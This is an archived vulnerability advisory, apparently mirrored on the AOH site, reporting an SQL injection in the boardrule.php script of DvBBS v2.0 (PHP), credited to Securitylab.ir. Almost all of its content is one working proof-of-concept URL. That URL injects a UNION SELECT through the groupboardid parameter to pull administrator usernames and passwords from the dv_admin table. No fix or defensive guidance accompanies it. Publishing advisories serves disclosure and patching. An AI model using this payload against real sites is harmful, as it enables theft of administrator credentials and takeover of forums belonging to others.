AOH :: HP Unsorted D :: BT-21606.HTM

DvBBS v2.0(PHP) boardrule.php Sql injection



DvBBS v2.0(PHP) boardrule.php Sql injection
DvBBS v2.0(PHP) boardrule.php Sql injection



########################## Securitylab.ir ########################=0D
# Application Info:=0D
# Name: DVBBS (php)=0D
# Version: 2.0=0D
# Vendor: http://p.dvbbs.net=0D 
#################################################################=0D
# Discoverd By: Securitylab.ir=0D
# Website: http://securitylab.ir=0D 
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir=0D
#################################################################=0D
# Vulnerability Info:=0D
# Type: Sql Injection=0D
# Risk: Medium=0D
#============================================================0D
# http://site.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/=0D 
#============================================================0D
#################################################################=0D
# Securitylab Security Research Team=0D
###################################################################

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.